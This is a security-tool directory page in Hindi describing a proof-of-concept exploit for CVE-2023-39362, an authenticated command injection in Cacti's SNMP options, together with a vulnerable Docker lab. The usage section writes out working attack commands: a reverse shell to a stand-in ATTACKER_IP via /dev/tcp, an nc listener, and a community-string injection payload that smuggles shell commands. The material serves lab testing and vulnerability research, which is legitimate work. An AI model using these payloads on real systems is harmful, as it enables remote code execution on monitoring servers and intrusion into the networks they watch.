Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc — सीवीई-2023-39362 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कैक्टी के एसएनएमपी विकल्पों में एक प्रमाणित कमांड इंजेक्शन। इसमें परीक्षण के लिए एक कमजोर डॉकर वातावरण और रिवर्स शेल क्षमता के साथ स्वचालित शोषण के लिए एक पायथन स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगलैब और अभ्यास
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

CVE-2023-39362-cacti-snmp-command-injection-poc

सीवीई-2023-39362 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कैक्टी के एसएनएमपी विकल्पों में एक प्रमाणित कमांड इंजेक्शन। इसमें परीक्षण के लिए एक कमजोर डॉकर वातावरण और रिवर्स शेल क्षमता के साथ स्वचालित शोषण के लिए एक पायथन स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
242 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Cacti (CVE-2023-39362) में कमांड इंजेक्शन कमजोरी - PoC

यह रेपो इस रेपो से फोर्क किया गया है: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti एक ओपन-सोर्स परिचालन निगरानी और दोष प्रबंधन फ्रेमवर्क है, जो अपने उपयोगकर्ता समुदाय की गतिशील आवश्यकताओं को पूरा करने के लिए लगातार विकसित हो रहा है।

संस्करण 1.2.24 में, CVE-2023-39362 के रूप में चिह्नित एक संभावित सुरक्षा कमजोरी की पहचान की गई है। विशिष्ट परिस्थितियों में, एक प्रमाणित विशेषाधिकार प्राप्त उपयोगकर्ता एक डिवाइस के SNMP विकल्पों में एक दोष का शोषण कर सकता है, एक दुर्भावनापूर्ण स्ट्रिंग का उपयोग करके जो कमांड इंजेक्शन की ओर ले जाती है। यह शोषण अंतर्निहित सर्वर पर प्रमाणित दूरस्थ कोड निष्पादन का परिणाम है।

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

इस कमजोरी के प्रभाव गंभीर हैं, क्योंकि प्रमाणित विशेषाधिकारों वाला एक दुर्भावनापूर्ण अभिनेता Cacti होस्ट करने वाले सर्वर की अखंडता से समझौता कर सकता है। यह समझौता संभावित रूप से नेटवर्क के भीतर अन्य होस्टों, विशेष रूप से Cacti द्वारा निगरानी किए जाने वाले होस्टों तक अनधिकृत पहुंच के प्रवेश द्वार के रूप में काम कर सकता है।

यह Cacti कमजोरी (CVE-2023-39362) के लिए शोषण का परीक्षण करने के लिए एक कमजोर अनुप्रयोग है।

चेतावनी!

इस एप्लिकेशन में गंभीर सुरक्षा कमजोरियाँ हैं। इसे अपने जोखिम पर चलाएँ! बैकअप और संरक्षित वातावरण (जैसे हाल ही के स्नैपशॉट और होस्ट-ओनली नेटवर्किंग वाला VM) का उपयोग करने की अनुशंसा की जाती है। इस एप्लिकेशन को किसी भी इंटरनेट-फेसिंग सर्वर पर अपलोड न करें, क्योंकि वे समझौता हो जाएंगे।

अस्वीकरण

मैं इस एप्लिकेशन का उपयोग करने के तरीके की जिम्मेदारी नहीं लेता। इस एप्लिकेशन का एकमात्र उद्देश्य CVE-2023-39362 शोषण के लिए एक परीक्षण परिदृश्य होना है और इसका दुर्भावनापूर्ण उपयोग नहीं किया जाना चाहिए। यदि इस एप्लिकेशन की स्थापना के माध्यम से आपका सर्वर समझौता किया जाता है, तो यह मेरी जिम्मेदारी नहीं है, यह उस व्यक्ति (व्यक्तियों) की जिम्मेदारी है जिसने इसे अपलोड और स्थापित किया।**

उपयोग

1. वातावरण सेट करें

यहाँ वातावरण सेटअप करने के चरण दिए गए हैं:

  1. रचना शुरू करने के लिए docker compose up -d चलाएँ।
  2. आप http://127.0.0.1/cacti पर ब्राउज़ करके Cacti आरंभीकरण विज़ार्ड शुरू करने के चरणों को अंतिम रूप दे सकते हैं। यदि आपको डेटाबेस से संबंधित कोई त्रुटि मिलती है, तो बस थोड़ी देर प्रतीक्षा करें और पृष्ठ को रीफ्रेश करें।
  3. डिफ़ॉल्ट क्रेडेंशियल्स admin/admin हैं।
  4. विज़ार्ड के दौरान सभी बटनों पर "अगला" दबाएँ, तदनुसार विकल्प चुनें। सभी डिफ़ॉल्ट ठीक होने चाहिए और सभी अनिवार्य पूर्वापेक्षाएँ पूरी होनी चाहिए।
  5. स्थापना के बाद, admin के रूप में लॉग इन करें।
  6. "कंसोल" > "कॉन्फ़िगरेशन" > "उपयोगकर्ता" पर जाएँ।
  7. guest उपयोगकर्ता पर क्लिक करें।
  8. उसे "सक्षम" करें, एक पासवर्ड सेट करें, यदि आप चाहें तो "अगले लॉगिन पर पासवर्ड बदलना अनिवार्य है" को अक्षम करें।
  9. "सहेजें" बटन पर क्लिक करें।
  10. "अनुमतियाँ" अनुभाग पर जाएँ।
  11. "सामान्य प्रशासन" के अंतर्गत, "कंसोल एक्सेस" और "साइट्स/डिवाइस/डेटा" सक्षम करें।
  12. "सहेजें" बटन पर क्लिक करें।
  13. लॉगआउट करें और शोषण का प्रयास करने के लिए guest के रूप में पुनः लॉगिन करें।

Cacti की आधिकारिक स्थापना मार्गदर्शिका यहाँ पाई जा सकती है।

वातावरण को टियरडाउन करने के लिए docker compose down कमांड का उपयोग करें।

2. शोषण स्क्रिप्ट चलाएँ

(यह शोषण का केवल एक संभावित मार्ग है)

दूरस्थ सर्वर पर कमांड चलाएँ:

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

रिवर्स शेल खोलना:

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. मैनुअल शोषण

  1. "कंसोल" > "बनाएँ" > "नया डिवाइस" पर जाएँ।
  2. एक ऐसा डिवाइस बनाएँ जो SNMP संस्करण 1 या 2 को सपोर्ट करता हो।
  3. सुनिश्चित करें कि डिवाइस में निम्न में से एक या अधिक टेम्पलेट वाले ग्राफ़ हों:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (टेम्पलेट "Net-SNMP Device" से डिवाइस बनाने से ग्राफ़ की पूर्वापेक्षा पूरी हो जाएगी)
  4. "SNMP विकल्प" में, "SNMP समुदाय स्ट्रिंग" फ़ील्ड के लिए, इस तरह का एक मान उपयोग करें: public\' ; touch /tmp/proof ; \'।
  5. "बनाएँ" बटन पर क्लिक करें।
  6. /tmp के अंतर्गत बनाई गई फ़ाइल की उपस्थिति की जाँच करें।

रिवर्स शेल प्राप्त करने के लिए, निम्नलिखित जैसे पेलोड का उपयोग किया जा सकता है।

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

मूल कारण

कमजोरी का विस्तृत मूल कारण मूल सुरक्षा सलाहकार या मूल लेखक के ब्लॉग पोस्ट पर उपलब्ध है।

लेखक

  • एंटोनियो फ्रांसेस्को सार्डेला - कमजोरी रिपोर्टर - m3ssap0
  • अकोस जकाब - पायथन स्क्रिप्ट के माध्यम से शोषण को स्वचालित करना - jakabakos

लाइसेंस

यह परियोजना Unlicense के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें